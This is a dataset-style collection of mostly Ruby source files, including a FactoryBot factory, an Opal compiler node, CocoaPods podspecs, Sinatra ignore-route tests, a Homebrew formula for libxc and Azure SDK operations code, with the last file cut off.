hexsha (stringlengths 40–40) | size (int64 2–1.01M) | content (stringlengths 2–1.01M) | avg_line_length (float64 1.5–100) | max_line_length (int64 2–1k) | alphanum_fraction (float64 0.25–1) |
---|---|---|---|---|---|
edce47c8cd4ebb48483d9abbe5acdeaf5738fa79 | 248 | FactoryBot.define do
factory :sync_token do
association :source_cell_volume, factory: :cell_volume
association :target_cell_volume, factory: :cell_volume
association :object, factory: :full_object
status :scheduled
end
end
| 27.555556 | 58 | 0.754032 |
f812492882427a6fce69787122c82f6e19bcaa7a | 2,857 | # frozen_string_literal: true
require 'pathname'
require 'opal/version'
require 'opal/nodes/scope'
module Opal
module Nodes
# Generates code for an entire file, i.e. the base sexp
class TopNode < ScopeNode
handle :top
children :body
def compile
push version_comment
opening
in_scope do
line '"use strict";' if compiler.use_strict?
body_code = stmt(stmts)
body_code = [body_code] unless body_code.is_a?(Array)
if compiler.eval?
add_temp '$nesting = self.$$is_a_module ? [self] : [self.$$class]'
else
add_temp 'self = Opal.top'
add_temp '$nesting = []'
end
add_temp 'nil = Opal.nil'
add_temp '$$$ = Opal.$$$'
add_temp '$$ = Opal.$$'
add_used_helpers
add_used_operators
line scope.to_vars
compile_method_stubs
compile_irb_vars
compile_end_construct
line body_code
end
closing
end
def opening
if compiler.requirable?
line "Opal.modules[#{Opal::Compiler.module_name(compiler.file).inspect}] = function(Opal) {"
elsif compiler.eval?
line '(function(Opal, self) {'
else
line '(function(Opal) {'
end
end
def closing
if compiler.requirable?
line "};\n"
elsif compiler.eval?
line '})(Opal, self)'
else
line "})(Opal);\n"
end
end
def stmts
compiler.returns(body)
end
def compile_irb_vars
if compiler.irb?
line 'if (!Opal.irb_vars) { Opal.irb_vars = {}; }'
end
end
def add_used_helpers
compiler.helpers.to_a.each { |h| add_temp "$#{h} = Opal.#{h}" }
end
def add_used_operators
operators = compiler.operator_helpers.to_a
operators.each do |op|
name = Nodes::CallNode::OPERATORS[op]
line "function $rb_#{name}(lhs, rhs) {"
line " return (typeof(lhs) === 'number' && typeof(rhs) === 'number') ? lhs #{op} rhs : lhs['$#{op}'](rhs);"
line '}'
end
end
def compile_method_stubs
if compiler.method_missing?
calls = compiler.method_calls
stubs = calls.to_a.map { |k| "'$#{k}'" }.join(', ')
line "Opal.add_stubs([#{stubs}]);" unless stubs.empty?
end
end
# Any special __END__ content in code
def compile_end_construct
if content = compiler.eof_content
line 'var $__END__ = Opal.Object.$new();'
line "$__END__.$read = function() { return #{content.inspect}; };"
end
end
def version_comment
"/* Generated by Opal #{Opal::VERSION} */"
end
end
end
end
| 24.843478 | 118 | 0.540777 |
61fd7bf1b18a0f043cae91829947d1f27752078b | 470 | # encoding: utf-8
# frozen_string_literal: true
module Services
module Products
# This is the Products index service
class Index < Services::ApplicationService
include Services::Concerns::ActsAsIndexable
def initialize(user_session, params)
@user_session = user_session
@params = params
end
def execute!
indexable(scope)
end
protected
def scope
Product
end
end
end
end
| 17.407407 | 49 | 0.640426 |
acd710f9f33e6ba0828e98131b9d08fe636b5780 | 1,660 | Pod::Spec.new do |s|
s.name = 'GRDB.swift'
s.version = '4.14.0'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.summary = 'A toolkit for SQLite databases, with a focus on application development.'
s.homepage = 'https://github.com/groue/GRDB.swift'
s.author = { 'Gwendal Roué' => '[email protected]' }
s.source = { :git => 'https://github.com/groue/GRDB.swift.git', :tag => "v#{s.version}" }
s.module_name = 'GRDB'
s.swift_versions = ['4.2', '5.0']
s.ios.deployment_target = '9.0'
s.osx.deployment_target = '10.9'
s.watchos.deployment_target = '2.0'
s.tvos.deployment_target = '9.0'
s.default_subspec = 'standard'
s.subspec 'standard' do |ss|
ss.source_files = 'GRDB/**/*.swift', 'Support/grdb_config.h'
ss.framework = 'Foundation'
ss.library = 'sqlite3'
end
s.subspec 'SQLCipher' do |ss|
ss.source_files = 'GRDB/**/*.swift', 'Support/grdb_config.h'
ss.framework = 'Foundation'
ss.dependency 'SQLCipher', '>= 3.4.0'
ss.xcconfig = {
'OTHER_SWIFT_FLAGS' => '$(inherited) -D SQLITE_HAS_CODEC -D GRDBCIPHER -D SQLITE_ENABLE_FTS5',
'OTHER_CFLAGS' => '$(inherited) -DSQLITE_HAS_CODEC -DGRDBCIPHER -DSQLITE_ENABLE_FTS5',
'GCC_PREPROCESSOR_DEFINITIONS' => '$(inherited) SQLITE_HAS_CODEC=1 GRDBCIPHER=1 SQLITE_ENABLE_FTS5=1'
}
end
# MARK: - iOS Static Framework
s.platform = :ios
s.ios.deployment_target = '9.0'
s.swift_version = '5.3'
s.license = {}
s.static_framework = true
s.subspecs.each do |sc|
cn = sc.consumer(:ios)
sc.ios.source_files = cn.source_files.map { |pt| "#{cn.version}/#{pt}" } if !cn.source_files.blank?
end
end
| 33.2 | 107 | 0.642169 |
184db35bdb6713db8ce300cbe1130728ddcf8864 | 373 | When /^I check hidden spam checkbox$/ do
id = find(".boolean.required[id*='confirmation_input'] input[name*='[confirmation]'][type=checkbox]")[:id]
page.evaluate_script <<-JS
document.getElementById("#{id}").checked = true
JS
end
When /^timestamp spam check will return probability (\d+)$/ do |value|
stub_spam_protection_timestamp_probability(value.to_f)
end
| 33.909091 | 108 | 0.729223 |
e91f233ee15b0ef5069f32e60cff7e0c92deb4a2 | 195 | class ContactNumber < ActiveRecord::Base
belongs_to :contact
validates :label, :number, presence: true, length: { maximum: 255 }
include TranslatableModel
translates :label, :number
end
| 24.375 | 69 | 0.753846 |
0197f7119da27a9d0d3728e8893e289c920170aa | 958 | Pod::Spec.new do |s|
s.version = "2.5.7"
s.source = { :http => "https://download.avoscloud.com/sdk/iOS/release-v#{s.version}/AVOSCloudSNS.framework.zip"}
s.platform = :ios, '5.0'
s.name = "AVOSCloudSNS"
s.summary = "AVOS Cloud SNS SDK for iOS"
s.homepage = "http://avoscloud.com"
s.license = { :type => 'Commercial', :text => '© Copyright 2013 AVOS Systems, Inc. See https://cn.avoscloud.com/terms.html' }
s.author = { "AVOS Cloud" => "[email protected]" }
s.documentation_url = 'https://cn.avoscloud.com/docs/api/iOS/index.html'
s.requires_arc = true
s.preserve_paths = "iOS/release-v#{s.version}/*"
s.vendored_frameworks = "iOS/release-v#{s.version}/AVOSCloudSNS.framework"
s.public_header_files = "iOS/release-v#{s.version}/**/*.h"
s.frameworks = 'CFNetwork', 'SystemConfiguration', 'MobileCoreServices', 'Security'
s.dependency 'AVOSCloud'
end
| 39.916667 | 134 | 0.631524 |
bb6d467cdc28d11ea99e2bd0f7533f8757d1a286 | 953 | # frozen_string_literal: true
require "rails/generators"
require "rails/generators/rails/model/model_generator"
module Dis
module Generators
class ModelGenerator < Rails::Generators::ModelGenerator
desc "Creates a Dis model"
def initialize(args, *options)
super(inject_dis_attributes(args), *options)
end
def add_model_extension
inject_into_file(
File.join("app/models", class_path, "#{file_name}.rb"),
after: "ActiveRecord::Base\n"
) do
" include Dis::Model\n"
end
end
private
def inject_dis_attributes(args)
if args.any?
[args[0]] + dis_attributes + args[1..args.length]
else
args
end
end
def dis_attributes
%w[
content_hash:string
content_type:string
content_length:integer
filename:string
]
end
end
end
end
| 21.177778 | 65 | 0.593914 |
08af9c2fd82a5dc63ea5f1b5eaf8a2137f032745 | 338 | cask 'hyper' do
version :latest
sha256 :no_check
# amazonaws.com is the official download host per the vendor homepage
url 'https://hyper-install.s3.amazonaws.com/hyper-mac.pkg'
name 'Hyper'
homepage 'https://hyper.sh/'
license :apache
pkg 'hyper-mac.pkg'
uninstall :script => '/opt/hyper/bin/uninstall-hyper.sh'
end
| 22.533333 | 71 | 0.713018 |
62de81250a0a372cf188afa60ab2935aee82ca5f | 351 | # frozen_string_literal: true
module ActionMailer
# Returns the version of the currently loaded Action Mailer as a <tt>Gem::Version</tt>.
def self.gem_version
Gem::Version.new VERSION::STRING
end
module VERSION
MAJOR = 5
MINOR = 2
TINY = 3
PRE = nil
STRING = [MAJOR, MINOR, TINY, PRE].compact.join(".")
end
end
| 19.5 | 89 | 0.660969 |
edb8802fb0f127e1c7f94b9eb9fc52e8bc9222c5 | 437 | #
# Cookbook:: openmrs
# Spec:: default
#
# Copyright:: 2017, The Authors, All Rights Reserved.
require 'spec_helper'
describe 'openmrs::default' do
context 'When all attributes are default, on an unspecified platform' do
let(:chef_run) do
runner = ChefSpec::ServerRunner.new
runner.converge(described_recipe)
end
it 'converges successfully' do
expect { chef_run }.to_not raise_error
end
end
end
| 20.809524 | 74 | 0.702517 |
ed22c71042c76bc9cf043056376de5c8bb278e5a | 1,188 | Rails.application.routes.draw do
root 'spaces#show'
# get "/auth/:provider/callback", "sessions#create"
# post "/auth/:provider/callback", "sessions#create"
# For details on the DSL available within this file, see https://guides.rubyonrails.org/routing.html
resources :spaces, only: %I[show edit update] do
resource :authenticated_session, only: %i[new create destroy show]
resources :invitations, only: %i[create destroy] do
resource :rsvp, only: %i[show update]
end
resources :rooms, only: %i[show edit update new create destroy] do
resource :waiting_room, only: %i[show update]
resources :furniture_placements, only: %i[create update destroy]
namespace :furniture do
Furniture.append_routes(self)
end
end
resources :utility_hookups, only: %I[create edit update destroy index]
end
resource :me, only: %i[show], controller: 'me'
match '/workspaces/*path', to: redirect('/spaces/%{path}'), via: [:GET]
resources :guides, only: %i[index show]
constraints BrandedDomain.new(Space) do
resources :authenticated_sessions, only: %i[new create delete show]
get '/:id', to: 'rooms#show'
end
end
| 32.108108 | 102 | 0.693603 |
26987fdfc669d47409110853e51220123cd6cba3 | 219 | # frozen_string_literal: true
# json formatter for logs
class JSONLogFormatter < ::Logger::Formatter
def call(severity, time, _progname, msg)
JSON.dump(level: severity, time: time, message: msg) + "\n"
end
end
| 24.333333 | 63 | 0.721461 |
6a39b3d1726508658944ee11ddd0eb80c98f2f64 | 1,423 | #
# Author:: Daniel DeLeo (<[email protected]>)
# Copyright:: Copyright (c) 2008 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
require 'support/shared/unit/resource/static_provider_resolution'
describe Chef::Resource::Git do
static_provider_resolution(
resource: Chef::Resource::Git,
provider: Chef::Provider::Git,
name: :git,
action: :sync,
)
before(:each) do
@git = Chef::Resource::Git.new("my awesome webapp")
end
it "is a kind of Scm Resource" do
expect(@git).to be_a_kind_of(Chef::Resource::Scm)
expect(@git).to be_an_instance_of(Chef::Resource::Git)
end
it "uses aliases revision as branch" do
@git.branch "HEAD"
expect(@git.revision).to eql("HEAD")
end
it "aliases revision as reference" do
@git.reference "v1.0 tag"
expect(@git.revision).to eql("v1.0 tag")
end
end
| 27.901961 | 74 | 0.712579 |
b9af18fd1d61d2db344a6578926a9e58fd32138c | 2,322 | class Grade < ActiveRecord::Base
belongs_to :fireman
validates_date :date, :allow_blank => true, :on_or_before => :today
after_save :update_intervention_editable_at
GRADE_CATEGORY = {
'Médecin' => 5,
'Infirmier' => 4,
'Officier' => 1,
'Sous-officier' => 2,
'Homme du rang' => 3,
'JSP' => 6
}.freeze
GRADE_CATEGORY_PLURAL = {
'Médecins' => 5,
'Infirmiers' => 4,
'Officiers' => 1,
'Sous-officiers' => 2,
'Hommes du rang' => 3,
'JSP' => 6
}
GRADE = {
'Médecin colonel' => 22,
'Médecin lieutenant-colonel' => 21,
'Médecin commandant' => 20,
'Médecin capitaine' => 19,
"Infirmier d'encadrement" => 18,
'Infirmier chef' => 17,
'Infirmier principal' => 16,
'Infirmier' => 15,
'Colonel' => 14,
'Lieutenant-colonel' => 13,
'Commandant' => 12,
'Capitaine' => 11,
'Lieutenant' => 10,
'Major' => 9,
'Adjudant-chef' => 8,
'Adjudant' => 7,
'Sergent-chef' => 6,
'Sergent' => 5,
'Caporal-chef' => 4,
'Caporal' => 3,
'1ère classe' => 2,
'2e classe' => 1,
'JSP 4' => 0,
'JSP 3' => -1,
'JSP 2' => -2,
'JSP 1' => -3
}.freeze
GRADE_CATEGORY_MATCH = { 1 => 3, 2 => 3, 3 => 3, 4 => 3,
5 => 2, 6 => 2, 7 => 2, 8 => 2,
9 => 1, 10 => 1, 11 => 1, 12 => 1, 13 => 1, 14 => 1,
15 => 4, 16 => 4, 17 => 4, 18 => 4,
19 => 5, 20 => 5, 21 => 5, 22 => 5,
0 => 6, -1 => 6, -2 => 6, -3 => 6}
def self.new_defaults
GRADE.sort_by {|grade| 1-grade[1] }.inject([]) do |result, grade|
result << Grade.new(:kind => grade[1])
end
end
private
def update_intervention_editable_at
self.fireman.station.update_intervention_editable_at if self.date_changed?
end
end
| 30.552632 | 79 | 0.393196 |
33517e62298984771fe6a4460f365e96fbf5db02 | 133 | module NotificationService
class ApplicationController < ActionController::API
include SharedModules::Authentication
end
end
| 22.166667 | 53 | 0.827068 |
5d35d30c4f0bd7dce9188dd98bb095fa266307e9 | 177 | class Etl::Edition::Content::ReadingTime
def self.calculate(words)
# 200 words per minute. Anything less than 1 minute rounds up to 1.
(words / 200.00).ceil
end
end
| 25.285714 | 71 | 0.706215 |
d59287a008d5555232553c6621a38a8181c29e85 | 1,763 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "aws_lambda_memory_amount/version"
Gem::Specification.new do |spec|
spec.name = "aws_lambda_memory_amount"
spec.version = AwsLambdaMemoryAmount::VERSION
spec.authors = ["haruharuharuby"]
spec.email = ["[email protected]"]
spec.summary = %q{Make a list of the memory amounts of all AWS Lambda functions}
spec.description = %q{This gem makes a list of the memory amounts of all Lambda functions and calculates the average memory amount over the latest 10 CWL events}
spec.homepage = "https://github.com/hugtechio/aws_lambda_memory_amount_ruby.git"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
# if spec.respond_to?(:metadata)
# spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
# else
# raise "RubyGems 2.0 or newer is required to protect against " \
# "public gem pushes."
# end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.16"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
end
| 45.205128 | 152 | 0.686897 |
ff8a24b623b121aacd3c65c704a2c2cf1deed48b | 8,544 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DigitalTwins::Mgmt::V2020_10_31
#
# Azure Digital Twins Client for managing DigitalTwinsInstance
#
class Operations
include MsRestAzure
#
# Creates and initializes a new instance of the Operations class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [AzureDigitalTwinsManagementClient] reference to the AzureDigitalTwinsManagementClient
attr_reader :client
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<Operation>] operation results.
#
def list(custom_headers:nil)
first_page = list_as_lazy(custom_headers:custom_headers)
first_page.get_all_items
end
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_with_http_info(custom_headers:nil)
list_async(custom_headers:custom_headers).value!
end
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_async(custom_headers:nil)
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '10'" if [email protected]_version.nil? && @client.api_version.length < 10
@client.api_version = '2020-10-31'
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'providers/Microsoft.DigitalTwins/operations'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DigitalTwins::Mgmt::V2020_10_31::Models::OperationListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [OperationListResult] operation results.
#
def list_next(next_page_link, custom_headers:nil)
response = list_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_next_with_http_info(next_page_link, custom_headers:nil)
list_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DigitalTwins::Mgmt::V2020_10_31::Models::OperationListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [OperationListResult] which provide lazy access to pages of the
# response.
#
def list_as_lazy(custom_headers:nil)
response = list_async(custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 38.660633 | 163 | 0.687149 |
39ce1c0148af951bd1991454661f91c183d10c26 | 6,188 | # encoding: utf-8
# This file is distributed under New Relic's license terms.
# See https://github.com/newrelic/rpm/blob/master/LICENSE for complete details.
class SinatraIgnoreTestApp < Sinatra::Base
get '/record' do request.path_info end
newrelic_ignore '/ignore'
get '/ignore' do request.path_info end
newrelic_ignore '/splat*'
get '/splattered' do request.path_info end
newrelic_ignore '/named/:id'
get '/named/:id' do request.path_info end
newrelic_ignore '/v1', '/v2'
get '/v1' do request.path_info end
get '/v2' do request.path_info end
get '/v3' do request.path_info end
newrelic_ignore(/\/.+regex.*/)
get '/skip_regex' do request.path_info end
get '/regex_seen' do request.path_info end
newrelic_ignore '/ignored_erroring'
get '/ignored_erroring' do raise 'boom'; end
newrelic_ignore_apdex '/no_apdex'
get '/no_apdex' do request.path_info end
newrelic_ignore_enduser '/no_enduser'
get '/enduser' do
"<html><head></head><body>#{request.path_info}</body></html>"
end
get '/no_enduser' do
"<html><head></head><body>#{request.path_info}</body></html>"
end
end
class SinatraTestCase < Minitest::Test
include Rack::Test::Methods
include ::NewRelic::Agent::Instrumentation::Sinatra
include MultiverseHelpers
JS_AGENT_LOADER = "JS_AGENT_LOADER"
setup_and_teardown_agent(:application_id => 'appId',
:beacon => 'beacon',
:browser_key => 'browserKey',
:js_agent_loader => JS_AGENT_LOADER)
def get_and_assert_ok(path)
get(path)
assert_equal 200, last_response.status
assert_match(/#{Regexp.escape(path)}/, last_response.body)
end
def assert_enduser_ignored(response)
refute_match(/#{JS_AGENT_LOADER}/, response.body)
end
def refute_enduser_ignored(response)
assert_match(/#{JS_AGENT_LOADER}/, response.body)
end
# Keep Test::Unit happy by specifying at least one test method here
# Real tests are defined in subclasses.
def test_nothing; end
end
class SinatraIgnoreTest < SinatraTestCase
def app
SinatraIgnoreTestApp
end
def app_name
app.to_s
end
def test_seen_route
get_and_assert_ok '/record'
segment = name_for_route 'record'
assert_metrics_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignores_exact_match
get_and_assert_ok '/ignore'
segment = name_for_route 'ignore'
assert_metrics_not_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignores_by_splats
get_and_assert_ok '/splattered'
segment = name_for_route 'splattered'
assert_metrics_not_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignores_can_be_declared_in_batches
get_and_assert_ok '/v1'
get_and_assert_ok '/v2'
get_and_assert_ok '/v3'
v1_segment = name_for_route 'v1'
v2_segment = name_for_route 'v2'
v3_segment = name_for_route 'v3'
assert_metrics_not_recorded([
"Controller/Sinatra/#{app_name}/#{v1_segment}",
"Controller/Sinatra/#{app_name}/#{v2_segment}",
"Apdex/Sinatra/#{app_name}/#{v1_segment}",
"Apdex/Sinatra/#{app_name}/#{v2_segment}"])
assert_metrics_recorded([
"Controller/Sinatra/#{app_name}/#{v3_segment}",
"Apdex/Sinatra/#{app_name}/#{v3_segment}"])
end
def test_seen_with_regex
get_and_assert_ok '/regex_seen'
segment = name_for_route 'regex_seen'
assert_metrics_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignores_by_regex
get_and_assert_ok '/skip_regex'
segment = name_for_route 'skip_regex'
assert_metrics_not_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignore_apdex
get_and_assert_ok '/no_apdex'
segment = name_for_route 'no_apdex'
assert_metrics_recorded(["Controller/Sinatra/#{app_name}/#{segment}"])
assert_metrics_not_recorded(["Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignore_enduser_should_only_apply_to_specified_route
get_and_assert_ok '/enduser'
segment = name_for_route 'enduser'
refute_enduser_ignored(last_response)
assert_metrics_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignore_enduser
get_and_assert_ok '/no_enduser'
segment = name_for_route 'no_enduser'
assert_enduser_ignored(last_response)
assert_metrics_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignore_errors_in_ignored_transactions
get '/ignored_erroring'
assert_metrics_not_recorded(["Errors/all"])
end
def name_for_route path
if last_request.env.key? 'sinatra.route'
"GET /#{path}"
else
"GET #{path}"
end
end
end
# Blanket ignore for whole app if newrelic_ignore called without parameters
class SinatraIgnoreItAllApp < Sinatra::Base
newrelic_ignore
get '/' do request.path_info end
end
class SinatraIgnoreItAllTest < SinatraTestCase
def app
SinatraIgnoreItAllApp
end
def test_ignores_everything
# Avoid Supportability metrics from startup of agent for this check
NewRelic::Agent.drop_buffered_data
get_and_assert_ok '/'
assert_metrics_recorded_exclusive(['Supportability/API/drop_buffered_data'])
end
end
# Blanket ignore for whole app if calls made without parameters
class SinatraIgnoreApdexAndEndUserApp < Sinatra::Base
newrelic_ignore_apdex
newrelic_ignore_enduser
get '/' do request.path_info end
end
class SinatraIgnoreApdexAndEndUserTest < SinatraTestCase
def app
SinatraIgnoreApdexAndEndUserApp
end
def test_ignores_apdex
get_and_assert_ok '/'
assert_metrics_not_recorded(["Apdex/Sinatra/#{app.to_s}/GET /"])
end
def test_ignores_enduser
get_and_assert_ok '/'
assert_enduser_ignored(last_response)
end
end
| 27.259912 | 80 | 0.714447 |
1cc5ebb7892d5dc98d424dd149f21678cb8a211d | 150 | require 'opencl_ruby_ffi'
require 'narray_ffi'
OpenCL::platforms.each do |p|
puts p.name
p.devices.each { |d| puts " --Device: #{d.name}" }
end
| 18.75 | 53 | 0.673333 |
d563e690ab4ec9a7e9b3149926c70cba2c46b01e | 179 | class ShowAction < SweetActions::JSON::ShowAction
# def set_resource
# resource_class.find(params[:id])
# end
# def authorized?
# can?(:read, resource)
# end
end
| 17.9 | 49 | 0.664804 |
4aea4cbbac3f1f716b7a03d14f339ed98077bdeb | 1,015 | # frozen_string_literal: true
require File.expand_path('lib/rggen/markdown/version', __dir__)
Gem::Specification.new do |spec|
spec.name = 'rggen-markdown'
spec.version = RgGen::Markdown::VERSION
spec.authors = ['Taichi Ishitani']
spec.email = ['[email protected]']
spec.summary = "rggen-markdown-#{RgGen::Markdown::VERSION}"
spec.description = <<~'DESCRIPTION'
Markdown generator for RgGen.
DESCRIPTION
spec.homepage = 'https://github.com/rggen/rggen-markdown'
spec.license = 'MIT'
spec.metadata = {
'bug_tracker_uri' => 'https://github.com/rggen/rggen-markdown/issues',
'mailing_list_uri' => 'https://groups.google.com/d/forum/rggen',
'source_code_uri' => 'https://github.com/rggen/rggen-markdown',
'wiki_uri' => 'https://github.com/rggen/rggen/wiki'
}
spec.files =
`git ls-files lib LICENSE CODE_OF_CONDUCT.mkd README.md`.split($RS)
spec.require_paths = ['lib']
spec.required_ruby_version = '>= 2.5'
spec.add_development_dependency 'bundler'
end
| 30.757576 | 74 | 0.705419 |
1d0d4fa2b02d38ebb33764a2168697e6011364a2 | 1,550 | class Libxc < Formula
desc "Library of exchange and correlation functionals for codes"
homepage "http://octopus-code.org/wiki/Libxc"
url "http://www.tddft.org/programs/octopus/down.php?file=libxc/3.0.1/libxc-3.0.1.tar.gz"
sha256 "836692f2ab60ec3aca0cca105ed5d0baa7d182be07cc9d0daa7b80ee1362caf7"
revision 1
bottle do
cellar :any
sha256 "10edb1b0047a9d08e4d86ebb49b3ff6f257649192be8f430893a29534c26cff7" => :high_sierra
sha256 "fb24b4f5ce8c2c2a438b26cdd33264850911ccd91494e038fd320b3cab8e4688" => :sierra
sha256 "7c5c77cef496e0d919fe0a99ee63c3594985be5f35d908bb4a1144f0dbad19bc" => :el_capitan
end
depends_on "gcc" # for gfortran
def install
system "./configure", "--prefix=#{prefix}",
"--enable-shared",
"FCCPP=gfortran -E -x c",
"CC=#{ENV.cc}"
system "make", "install"
end
test do
(testpath/"test.c").write <<~EOS
#include <stdio.h>
#include <xc.h>
int main()
{
int major, minor, micro;
xc_version(&major, &minor, &micro);
printf(\"%d.%d.%d\", major, minor, micro);
}
EOS
system ENV.cc, "test.c", "-L#{lib}", "-lxc", "-I#{include}", "-o", "ctest"
system "./ctest"
(testpath/"test.f90").write <<~EOS
program lxctest
use xc_f90_types_m
use xc_f90_lib_m
end program lxctest
EOS
system "gfortran", "test.f90", "-L#{lib}", "-lxc", "-I#{include}",
"-o", "ftest"
system "./ftest"
end
end
| 31 | 93 | 0.610323 |
33a10a4a6dc5346f877707c95b22617fabb9c02e | 259 | class CreateProjects < ActiveRecord::Migration[5.2]
def change
create_table :projects do |t|
t.string :name
t.string :description
t.date :due_date
t.integer :status
t.integer :owner_id
t.timestamps
end
end
end
| 18.5 | 51 | 0.640927 |
e871ec7d77b6d208af4305497d4343466f396d13 | 4,435 | class VisitorsController < ApplicationController
def complete_registration
